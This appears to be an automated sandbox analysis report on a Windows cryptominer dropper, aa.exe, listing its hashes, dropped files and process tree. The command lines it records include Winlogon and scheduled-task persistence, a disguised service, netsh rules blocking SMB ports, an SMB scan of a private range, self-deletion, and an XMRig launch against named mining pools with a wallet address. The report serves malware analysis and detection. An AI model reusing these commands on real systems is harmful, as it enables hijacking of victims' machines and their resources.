Analysis
- max time kernel: 151s
- max time network: 152s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 07-05-2021 12:57
Behavioral task behavioral1
- Sample: aa.exe
- Resource: win7v20210410
Behavioral task behavioral2
- Sample: aa.exe
- Resource: win10v20210408
General
- Target: aa.exe
- Size: 28.1MB
- MD5: 8d9d7f5babe3ee15f2e93a4321fa45cf
- SHA1: 689d53ae66e75e0b5715c0d04a7cab20e5390790
- SHA256: c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
- SHA512: 12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91
Malware Config
Signatures
Modifies WinLogon for persistence (2 TTPs, 1 IoC)
Processes (description, ioc, process):
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\JEkAx\\spmjgd.exe" (spmjgd.exe)
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
XMRig Miner Payload (4 IoCs)
Processes (resource, yara_rule):
- C:\Windows\JEkAx\spmjgd.exe: xmrig
- C:\Windows\JEkAx\spmjgd.exe: xmrig
- C:\Windows\JEkAx\HW.exe: xmrig
- behavioral2/memory/3052-161-0x0000000000400000-0x0000000000B4B000-memory.dmp: xmrig
Creates new service(s) (1 TTP)
Executes dropped EXE (4 IoCs)
Processes (pid, process):
- 348 spmjgd.exe
- 3052 HW.exe
- 3588 svchost.exe
- 184 svchost.exe
Drops file in Windows directory (64 IoCs)
Processes (description, ioc, process):
- File created C:\Windows\JEkAx\pcla-0.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\pcre-0.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\riar-2.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\tucl-1.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\svchost.exe (spmjgd.exe)
- File created C:\Windows\JEkAx\chrome..exe (spmjgd.exe)
- File created C:\Windows\JEkAx\exma.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\pcreposix-0.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\tibe.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\coli-0.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\etchCore-0.x64.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\eteb-2.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\exma-1.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\tibe-1.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\ip.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\Cstr.fb (spmjgd.exe)
- File created C:\Windows\JEkAx\Cstr.xml (spmjgd.exe)
- File created C:\Windows\JEkAx\cnli-0.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\tibe-2.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\chrome..xml (spmjgd.exe)
- File created C:\Windows\JEkAx\posh-0.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\TFf (spmjgd.exe)
- File created C:\Windows\JEkAx\adfw-2.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\etch-0.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\libxml2.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\trfo-2.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\tucl.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\xdvl-0.dll (spmjgd.exe)
- File opened for modification C:\Windows\JEkAx\Result.txt (svchost.exe)
- File created C:\Windows\JEkAx\dmgd-1.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\libeay32.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\riar.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\zlib1.dll (spmjgd.exe)
- File opened for modification C:\Windows\JEkAx\s.bat (spmjgd.exe)
- File created C:\Windows\JEkAx\tscl.html (aa.exe)
- File created C:\Windows\JEkAx\spmjgd.exe (aa.exe)
- File created C:\Windows\JEkAx\etchCore-0.x86.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\HW.exe (spmjgd.exe)
- File created C:\Windows\IME\tps.exe (aa.exe)
- File created C:\Windows\boy.exe (aa.exe)
- File created C:\Windows\JEkAx\chrome..fb (spmjgd.exe)
- File created C:\Windows\JEkAx\adfw.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\trch.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\trch-1.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\trfo.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\ssleay32.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\zibe.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\s.bat (spmjgd.exe)
- File created C:\Windows\end.bat (spmjgd.exe)
- File created C:\Windows\JEkAx\dmgd-4.dll (spmjgd.exe)
- File opened for modification C:\Windows\JEkAx\tscl.html (spmjgd.exe)
- File created C:\Windows\JEkAx\etebCore-2.x64.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\etebCore-2.x86.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\libiconv-2.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\posh.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\ucl.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\libcurl.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\trch-0.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\trfo-0.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\WinRing0x64.sys (spmjgd.exe)
- File opened for modification C:\Windows\end.bat (spmjgd.exe)
- File created C:\Windows\JEkAx\qdx.bat (spmjgd.exe)
- File created C:\Windows\JEkAx\cnli-1.dll (spmjgd.exe)
- File created C:\Windows\JEkAx\Cstr.exe (spmjgd.exe)
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes (pid, process):
- 348 spmjgd.exe (all 64 IoCs are this process)
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes (description, pid, process):
- Token: SeLockMemoryPrivilege 3052 HW.exe
- Token: SeLockMemoryPrivilege 3052 HW.exe
Suspicious use of SetWindowsHookEx (4 IoCs)
Processes (pid, process):
- 624 aa.exe
- 624 aa.exe
- 348 spmjgd.exe
- 348 spmjgd.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (description, pid, process, target process); each entry was recorded three times unless noted:
- PID 624 aa.exe wrote to memory of 348 spmjgd.exe
- PID 624 aa.exe wrote to memory of 3708 cmd.exe
- PID 348 spmjgd.exe wrote to memory of 2964 cmd.exe
- PID 2964 cmd.exe wrote to memory of 2292 netsh.exe
- PID 2964 cmd.exe wrote to memory of 2800 netsh.exe
- PID 2964 cmd.exe wrote to memory of 3600 netsh.exe
- PID 2964 cmd.exe wrote to memory of 3732 netsh.exe
- PID 2964 cmd.exe wrote to memory of 840 netsh.exe
- PID 2964 cmd.exe wrote to memory of 844 netsh.exe
- PID 2964 cmd.exe wrote to memory of 3984 netsh.exe
- PID 2964 cmd.exe wrote to memory of 620 netsh.exe
- PID 2964 cmd.exe wrote to memory of 2304 netsh.exe
- PID 2964 cmd.exe wrote to memory of 3580 netsh.exe
- PID 348 spmjgd.exe wrote to memory of 2172 cmd.exe
- PID 348 spmjgd.exe wrote to memory of 2300 cmd.exe
- PID 2172 cmd.exe wrote to memory of 3592 netsh.exe
- PID 2300 cmd.exe wrote to memory of 3600 netsh.exe
- PID 2172 cmd.exe wrote to memory of 3912 netsh.exe
- PID 2172 cmd.exe wrote to memory of 3676 netsh.exe
- PID 2300 cmd.exe wrote to memory of 3924 netsh.exe
- PID 2300 cmd.exe wrote to memory of 2256 netsh.exe
- PID 2172 cmd.exe wrote to memory of 408 netsh.exe (recorded once; list capped at 64 IoCs)
Processes
Process tree (indentation shows parent/child depth; the command line follows each image path):

[1] C:\Users\Admin\AppData\Local\Temp\aa.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\aa.exe"
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\JEkAx\spmjgd.exe
      Command line: C:\Windows\JEkAx\spmjgd.exe
      - Modifies WinLogon for persistence
      - Executes dropped EXE
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add policy name=ipsec_ply
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filterlist name=deny_pt
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filterlist name=allow_pt
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filteraction name=deny action=block
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filteraction name=allow action=negotiate
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static set policy name=ipsec_ply assign=y

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add policy name=ipsec_ply
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filterlist name=deny_pt
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filterlist name=allow_pt
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filteraction name=deny action=block
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filteraction name=allow action=negotiate
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static set policy name=ipsec_ply assign=y

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add policy name=ipsec_ply
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filterlist name=deny_pt
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filterlist name=allow_pt
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filteraction name=deny action=block
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filteraction name=allow action=negotiate
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static set policy name=ipsec_ply assign=y

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "

    [3] C:\Windows\SysWOW64\sc.exe
        Command line: sc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\JEkAx\qdx.bat" "

      [4] C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\JEkAx\spmjgd.exe" /SC ONSTART
          - Creates scheduled task(s)

    [3] C:\Windows\JEkAx\HW.exe
        Command line: "C:\Windows\JEkAx\HW.exe" -o stratum+tcp://dns.monerogb.com:6502 -o stratum+tcp://note.monerogb.com:8666 -o stratum+tcp://wk.sdffdasdfsdfaczxfwd53.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=1
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\JEkAx\s.bat" "

      [4] C:\Windows\JEkAx\svchost.exe
          Command line: svchost.exe syn 10.10.0.0 10.10.255.255 445 /save
          - Executes dropped EXE

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\JEkAx\s.bat" "

      [4] C:\Windows\JEkAx\svchost.exe
          Command line: svchost.exe tcp 10.10.0.0 10.10.255.255 445 450 /save
          - Executes dropped EXE
          - Drops file in Windows directory

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\aa.exe"
MITRE ATT&CK Matrix ATT&CK v6
Downloads